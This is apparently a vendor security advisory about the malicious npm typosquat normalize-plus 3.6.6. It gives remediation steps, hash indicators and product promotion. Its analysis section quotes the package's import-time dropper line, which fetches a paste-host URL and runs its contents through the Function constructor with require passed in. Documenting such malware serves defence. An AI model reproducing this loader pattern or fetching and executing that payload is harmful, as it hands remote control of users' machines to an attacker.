Which versions of normalize-plus are malicious?

The following npm versions of normalize-plus are flagged malicious: 3.6.6. Treat any of these as compromised.

How do I remediate normalize-plus if I installed it?

normalize-plus is a typosquat — you almost certainly intended a legitimately-named package. Remove normalize-plus, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.

I already installed normalize-plus — how do I know if it already compromised me?

If normalize-plus was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is normalize-plus part of a known attack campaign?

Yes — normalize-plus is associated with the GHSA-fr34-v6cp-fc49, IN-MAL-2026-007451 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find normalize-plus across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for normalize-plus (version 3.6.6). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging normalize-plus across your stack and pipelines.

Malicious package

normalize-plusnpm

Malicious code in normalize-plus (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6399

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall normalize-plus

What this malware does

On import, normalize-plus's top-level initPlugin() performs an HTTP GET against https://jsonkeeper.com/b/CI3HT, parses the JSON response, and evaluates its cookie field through the Function constructor: const handler = new (Function.constructor)('require', JSON.parse(b).cookie); if (handler) handler(require); (index.js line 74; URL default at line 65). The require symbol is then passed into the dynamically-constructed function, granting the remote payload full Node.js module-loading and filesystem privileges in any consumer that requires this package. jsonkeeper.com is a mutable anonymous paste host, so the maintainer can swap the executed code at any time without republishing the package. The package additionally mimics the API of the widely-used normalize-path package (exporting a normalizePath function) and self-describes as 'Stylus porting of normalize.css', combining a typosquat lure with an import-time remote-code-execution dropper.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

1 flagged

3.6.6

Indicators of compromise (SHA-256)

68736aa001dbb92a66fb97c6f5592b47bd0bafdcb56a325a4c8595f0b10829c7

a8d9638f9c3f81ac15972cf2ff227b2d426a72c5e37035e54402648fe8120675

Detection & response playbook

Typosquat

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for normalize-plus (version 3.6.6). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging normalize-plus across your stack and pipelines.
If you installed it — respond
normalize-plus is a typosquat — you almost certainly intended a legitimately-named package. Remove normalize-plus, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.
Did it already run?
If normalize-plus was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks normalize-plus before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. normalize-plus on npm has been identified as a malicious package (version 3.6.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

GHSA-fr34-v6cp-fc49IN-MAL-2026-007451

References

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks normalize-plus-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Malware detection Runtime egress monitoring